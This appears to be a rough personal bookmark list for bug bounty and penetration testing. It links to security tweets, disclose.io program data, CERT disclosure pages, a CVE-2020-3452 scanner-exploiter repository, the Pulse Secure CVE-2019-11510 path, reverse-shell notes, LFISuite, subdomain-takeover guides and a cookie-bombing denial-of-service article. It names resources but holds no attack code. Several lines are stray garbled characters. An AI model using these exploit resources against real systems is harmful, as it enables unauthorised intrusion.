https://www.youtube.com/watch?v=9W94AKLc5g8\nWatch Live [Current] https://www.youtube.com/c/Ch1R0n1n\n### Twitter Tweetin'\nhttps://twitter.com/samwcyo/status/1529888063576584202\nhttps://twitter.com/sshell_\nhttps://mobile.twitter.com/TechnoTimLive Devops tweets\nhttps://mobile.twitter.com/drunkrhin0/status/1344130729320435712\nhttps://twitter.com/0xMstar/status/1464658472981565444{{\nhttps://twitter.com/0xJin/status/1470748925963513863\n\npodcasts\nhttps://open.spotify.com/episode/2VaH6DgbghMEiaimqdxq4Q\n### Data\n---\n\n* [Disclose.io - program List Data](https://raw.githubusercontent.com/disclose/diodb/master/program-list.json)\n\nCVE-2019-11510 Detail \n/dana-na\n\n## CVE/CVD\n---\n\nCVE [2020-3452](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)xx\n\n- https://vuls.cert.org/confluence/display/CVD/Executive+Summary\n- https://vuls.cert.org/confluence/display/CVD/Sightings\n\n\nhttps://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods\nhttps://opensourcelibs.com/lib/google-acquisitions\n\n\n\nReverse shells\nhttps://github.com/wwkenwong/Pentest-note\n\nhttps://github.com/tehryanx?tab=repositories\nhttps://github.com/sawzeeyy/Sanitiz3r\nhttps://buaq.net/go-249.html\n\n\n\n s\n\n(https://github.com/Findomain/Findomain/releases)\n*   [Configuing Findomain](https://www.youtube.com/watch?v=Wpm2C1LD9ns)\n*   https://github.com/findomain/findomain/blob/master/README.md#subdomains-monitoring\n\n\nhttps://github.com/D35m0nd142/LFISuite\n\nhttps://hub.docker.com/u/secsi\ntips\n\n\n\n\nWig\nhttps://linuxsecurity.expert/tools/wig/\nxxxzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzx\u03a9xxxxxxxxxxx\u2248\u2248\nBlindElephant\nhttps://linuxsecurity.expert/tools/blindelephant/alternatives/\n\n\nhttps://ronak-9889.medium.com/denial-of-service-using-cookie-bombing-55c2d0ef808c\n\nIOT\n                https://www.youtube.com/watch?v=AKoyZLibIeo  ", "creation_timestamp": "2026-07-10T00:21:33.722762Z"}]}